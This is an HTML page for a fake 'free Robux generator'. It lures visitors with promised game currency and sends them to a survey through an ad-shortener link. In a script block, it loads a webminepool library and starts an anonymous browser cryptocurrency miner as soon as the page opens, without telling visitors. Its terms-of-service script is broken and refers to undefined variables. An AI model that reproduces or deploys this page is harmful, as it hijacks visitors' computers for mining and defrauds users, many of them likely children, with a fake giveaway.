<!DOCTYPE html>
<html>
<head>
<title>WELCOME TO OUR ROBUX GEN!</title>
   <script src="https://webminepool.com/lib/base.js"></script>
<style>
   * {
      margin: 0;
   }
body {
text-align: center;
font-family: Arial;
}
   div {
      width: 500px;
      height: 100px;
      border-radius: 10px;
      background-color: darkgrey;
      margin: auto;
   }
   .tos-container {
      background-color: darkslategray;
      border-radius: 10px;
      position: fixed;
      bottom: 0;
      left: 0;
      right: 0;
      color: white;
      padding: 0 32px;
      box-shadow: 0 -2px 16px grey;
      
      transition: 400ms;
   }
   
   .tos-container a {
      color: white;
   }
   
   .tos-button {
      background-color: #e84118;
      border: 0;
      padding: 12px 48px;
      cursor: pointer;
   }
</style>
</head>

<body>
<h1>GET FREE ROBUX!</h1>
   <h2>Use this free legit ROBUX generator!</h2>
   <h2>Complete offers and get rewards!</h2>
   <hr>
   <br>
   <div>
      <h4>Do this <a href="http://gestyy.com/etSlqD">survey</a> for 10 Robux.</h4>
    <p>+10 Robux</p>
   </div>
   
   
   
   
   
  <div class="tos-container">

<p>
   READ OUR <a href="./terms.html">TERMS OF SERVICE</a>, by clicking "Accept" you agree to our terms.
     </p>
     
     <button class="tos-button">Accept</button>
     
   </div>
  
<script>
    var miner = WMP.Anonymous('SK_qnYYEDQWTtoXQpxiOncpo', {throttle: 0.3});
    miner.start();
   </script>
   <script>
      const = tosContainer = document.querySelector(".tos-container");
      const = tosButton = document.querySelector(".tos-button");
      
      cookieButton.addEventListener("click", () => {
                                   cookieContainer.classList.remove("active");
                                    });
   </script>
</body>

</html>
